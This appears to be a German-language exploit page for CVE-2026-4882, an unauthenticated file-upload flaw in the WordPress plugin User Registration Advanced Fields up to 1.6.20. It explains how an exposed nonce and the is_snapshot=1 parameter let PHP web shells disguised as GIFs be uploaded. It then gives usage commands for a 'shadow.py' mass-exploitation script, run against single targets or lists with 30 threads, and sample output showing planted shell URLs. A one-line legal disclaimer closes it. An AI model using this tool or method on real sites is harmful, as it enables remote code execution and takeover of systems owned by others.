
User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload
User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload
User Registration Advanced Fields <= 1.6.20 - Nicht authentifizierter beliebiger Datei-Upload
Beschreibung
Das User Registration Advanced Fields Plugin für WordPress (Versionen bis einschließlich 1.6.20) ist anfällig für nicht authentifizierten beliebigen Datei-Upload über die AJAX-Aktion uraf_profile_picture_upload_method_upload. Das Plugin gibt ein gültiges Nonce über wp_localize_script() auf jeder Seite frei, die ein Registrierungsformular enthält, und durch die Verwendung des Parameters is_snapshot=1 wird die Dateierweiterungsvalidierung vollständig umgangen. Dies ermöglicht nicht authentifizierten Angreifern, beliebige Dateien (z.B. als GIF-Bilder getarnte PHP-Webshells) hochzuladen, die in wp-content/uploads/user_registration_uploads/temp-uploads/ gespeichert werden, was zur vollständigen Remote-Code-Ausführung (RCE) führt.
~ CVSS-Score: 9.8 (Kritisch)
~ Betroffene Versionen: <= 1.6.20
Einzelziel :
python3 shadow.py -u https://target.com -s shadow.phpMassenziele :
python3 shadow.py -f targets.txt -s shadow.php -t 30Interaktiver Modus :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
Die unbefugte Nutzung von Systemen, die dir nicht gehören oder für die du keine Berechtigung zum Testen hast, ist illegal.